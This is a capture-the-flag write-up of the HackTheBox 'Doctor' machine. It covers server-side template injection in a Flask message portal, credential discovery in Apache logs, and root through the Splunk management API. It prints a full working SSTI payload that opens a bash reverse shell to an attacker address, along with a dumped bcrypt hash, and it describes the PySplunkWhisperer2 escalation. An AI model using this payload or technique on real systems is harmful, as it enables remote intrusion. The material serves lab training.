HTB Doctor
Writeup for Doctor box on HackTheBox.eu
Initial enumeration
Found ports 22, 80 and 8089 open on the box.
While browsing the IP we discover the hostname doctors.htb. After adding it to /etc/hosts and accessing the page we find a new portal:
After registering an account we discover that we can post messages. Inspecting the source code of the page we also find an /archive page that seems to be under development; however, if we post a new message, its title appears in the XML feed served there.
Since this is a Python application, it's worth checking for SSTI (Server-Side Template Injection): user input that is concatenated into a template instead of being passed to it as a variable gets evaluated by the template engine.
The first payload to try is a simple {{ 4 * 4 }}: if the injection works, the title shows up as 16 in the feed. It does, so we can move to a more complex payload that gets a reverse shell. It works in three stages: the first expression reaches open() through the globals of the Flask helper get_flashed_messages (they include __builtins__) and writes a small Python file to /var/tmp; the second loads that file with config.from_pyfile(), which executes it and stores subprocess.check_output in the config as RUNCMD; the third calls it with a bash reverse shell. The body is form-encoded, which is why the & of the shell redirection is sent as %26:
title={{ get_flashed_messages.__globals__.__builtins__.open("/var/tmp/cccc2.cfg", "w").write("from subprocess import check_output\n\nRUNCMD = check_output\n") }}{{ config.from_pyfile("/var/tmp/cccc2.cfg") }}{{ config["RUNCMD"]("/bin/bash -c '/bin/bash -i >%26 /dev/tcp/10.10.14.38/8443 0>%261'",shell=True) }}&content=a&submit=Post
User enumeration
We land as the user web. Note the adm group: on Debian/Ubuntu it grants read access to most files under /var/log, which matters in a moment.
$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
Running LinPEAS turns up the web application's user table:
--> Found interesting column names in user (output limit 10)
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(20) NOT NULL,
email VARCHAR(120) NOT NULL,
image_file VARCHAR(20) NOT NULL,
password VARCHAR(60) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username),
UNIQUE (email)
)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S
The password column holds a bcrypt hash (the $2b$12$ prefix means bcrypt with cost factor 12), which is slow to crack; the next finding makes that unnecessary.
In /var/log/apache2 (readable thanks to the adm group) there is a backup file in which we can see something strange:
The string from the backup file works as shaun's password.
Privilege escalation
Splunkd app command execution exploit
Port 8089, seen in the initial scan, is the Splunk management port. With valid credentials the management API lets you install an app from a URL, and an app can carry a scripted input, which splunkd executes as the account it runs under (root when the forwarder was installed and started as root). PySplunkWhisperer2_remote.py automates this: it serves a tar containing such an app from the attacker host, installs it through the API, waits for the script to run and then removes the app. Using the exploit from https://github.com/cnotin/SplunkWhisperer2/blob/master/PySplunkWhisperer2/PySplunkWhisperer2_remote.py, pointed at the target with --host and --port 8089, the credentials with --username and --password, the attacker address with --lhost and the command to run with --payload.